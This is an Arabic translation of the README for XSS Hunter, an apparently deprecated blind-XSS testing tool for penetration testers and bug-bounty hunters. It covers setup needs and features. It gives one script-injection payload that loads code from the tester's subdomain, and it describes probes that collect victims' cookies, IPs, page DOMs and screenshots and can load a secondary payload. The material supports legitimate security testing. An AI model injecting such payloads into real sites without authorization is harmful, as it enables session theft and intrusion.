مهمل - جرب النسخة إكسبريس الجديدة
انظر هنا للمزيد من المعلومات: https://github.com/mandatoryprogrammer/xsshunter-express
كود مصدر XSS Hunter
هذه نسخة محمولة من الكود المصدري الذي يعمل على https://xsshunter.com. وهي مصممة ليتم تثبيتها بسهولة على أي خادم لمحترفي الأمن وصائدي الثغرات الذين يرغبون في اختبار XSS بطريقة أكثر قوة.
إذا كنت لا تريد إعداد هذا البرنامج وتفضل البدء في الاختبار مباشرة، انظر https://xsshunter.com .
المتطلبات
- خادم يعمل (يفضل) بنظام Ubuntu.
- حساب Mailgun، لإرسال رسائل البريد الإلكتروني عند تفعيل حمولة XSS.
- اسم نطاق، ويفضل أن يكون قصيراً لتقليل أحجام الحمولة. إليك موقع جيد للعثور على أسماء نطاق من حرفين: https://catechgory.com/. نطاقي هو xss.ht على سبيل المثال.
- شهادة SSL بدلائل فرعية (Wildcard)، هذه رخيصة. هذا مطلوب لأن XSS Hunter يحدد المستخدمين بناءً على نطاقاتهم الفرعية ويجب أن تكون جميعها مشغلة بـ SSL. لا يمكننا استخدام Let's Encrypt لأن هم لا يدعمون شهادات البدلاء. سأمتنع عن إهانة نموذج أعمال CA، ولكن كن مطمئناً أنه سخيف للغاية ويكلفهم القليل جداً لإصدار شهادة بدلاء لك، لذا اختر أرخص مزود تجده (طالما أنه مدعوم في جميع المتصفحات).
الإعداد
يرجى الاطلاع على https://thehackerblog.com/xss-hunter-is-now-open-source-heres-how-to-set-it-up/ للحصول على معلومات حول كيفية إعداد XSS Hunter على الخادم الخاص بك.
ملخص الوظائف
عند التسجيل، ستقوم بإنشاء نطاق فرعي قصير خاص مثل yoursubdomain.xss.ht والذي يحدد ثغرات XSS الخاصة بك ويستضيف حمولتك. ثم تستخدم هذا النطاق الفرعي في اختبار XSS الخاص بك، باستخدام محاولات حقن مثل "><script src=//yoursubdomain.xss.ht></script>. سيقوم XSS Hunter تلقائياً بتقديم مسابير XSS وجمع المعلومات الناتجة عند تفعيلها.
الميزات
- إدارة تفعيل حمولة XSS: إدارة جميع حمولات XSS الخاصة بك في لوحة التحكم بحساب XSS Hunter.
- مسابير XSS قوية: يتم جمع المعلومات التالية في كل مرة يتم فيها تفعيل مسبار على صفحة ضعيفة:
- URI الصفحة الضعيفة
- مصدر التنفيذ
- عنوان IP للضحية
- Referer الصفحة
- وكيل المستخدم للضحية
- جميع ملفات تعريف الارتباط غير HTTP-Only
- DOM HTML الكامل للصفحة
- لقطة شاشة كاملة للصفحة المتأثرة
- طلب HTTP المسؤول (إذا تم استخدام أداة متوافقة مع XSS Hunter)
- لقطات شاشة كاملة للصفحة: تستخدم مسابير XSS Hunter واجهة برمجة تطبيقات Canvas في HTML5 لإنشاء لقطة شاشة كاملة للصفحة الضعيفة التي تم تفعيل حمولة XSS عليها. بهذه الميزة يمكنك الاطلاع على لوحات الإدارة الداخلية، مكاتب الدعم، أنظمة التسجيل، وتطبيقات الويب الداخلية الأخرى. يتيح ذلك تقارير أكثر قوة تُظهر التأثير الكامل للثغرة لعميلك أو برنامج مكافآت الثغرات.
- إنشاء تقارير Markdown: يأتي كل تقرير عن تفعيل حمولة XSS مع تقرير Markdown مُنشأ مسبقاً. هذه التقارير المُنشأة متوافقة أيضاً مع منصات أخرى تدعم Markdown مثل Phabricator لسهولة الإبلاغ عن الأخطاء في أنظمة التذاكر بالشركة.
- تقارير البريد الإلكتروني عن تفعيل حمولة XSS: ترسل تفعيلات حمولة XSS أيضاً تقارير مفصلة عبر البريد الإلكتروني يمكن إعادة توجيهها بسهولة إلى جهات الاتصال الأمنية المناسبة للإبلاغ السريع عن الأخطاء الحرجة.
- توليد الحمولة تلقائياً: يقوم XSS Hunter تلقائياً بتوليد حمولات XSS لاستخدامها في اختبار أمن تطبيقات الويب.
- محاولات الحقن المرتبطة: ربما تكون الميزة الأقوى في XSS Hunter هي القدرة على ربط محاولات الحقن مع تفعيلات حمولة XSS. باستخدام أداة اختبار متوافقة مع XSS Hunter يمكنك معرفة ما الذي تسبب في تفعيل حمولة معينة على الفور (حتى بعد أسابيع من محاولة الحقن!).
- خيار تشفير PGP لرسائل البريد الإلكتروني للحمولة: هل أنت شديد المراقبة؟ يتوفر تشفير PGP من جانب العميل والذي سيشفر جميع بيانات الحقن في متصفح الضحية قبل إرسالها إلى خدمة XSS Hunter.
- التقاط الصفحات: عند تفعيل حمولة XSS الخاصة بك، يمكنك تحديد قائمة من المسارات النسبية ليقوم المسبار باستردادها وتخزينها تلقائياً. هذا مفيد في العثور على ثغرات أخرى مثل سياسات
crossdomain.xml السيئة على الأنظمة الداخلية التي لا يمكن الوصول إليها عادةً.
- تحميل الحمولة الثانوية: هل لديك حمولة ثانوية تريد تحميلها بعد أن يقوم XSS Hunter بعمله؟ يوفر XSS Hunter خيار تحديد حمولة JavaScript ثانوية لتشغيلها بعد الانتهاء من الجمع.
- تطبيق ويب iOS: من الممكن أيضاً عرض تفعيلات حمولة XSS الخاصة بك عبر تطبيق ويب iOS. ببساطة انتقل إلى المسار
/app واحفظ الصفحة كتطبيق ويب على سطح مكتب iPhone الخاص بك.
اختراقات بارزة
هل تريد المساهمة؟
جميع الكود تم إنشاؤه بواسطتي و (لهذا السبب) من المحتمل أنه ليس ممارسة مثلى و بالتأكيد يحتاج إلى تحسين/تنظيف. أي طلبات سحب (Pull Requests) موضع تقدير!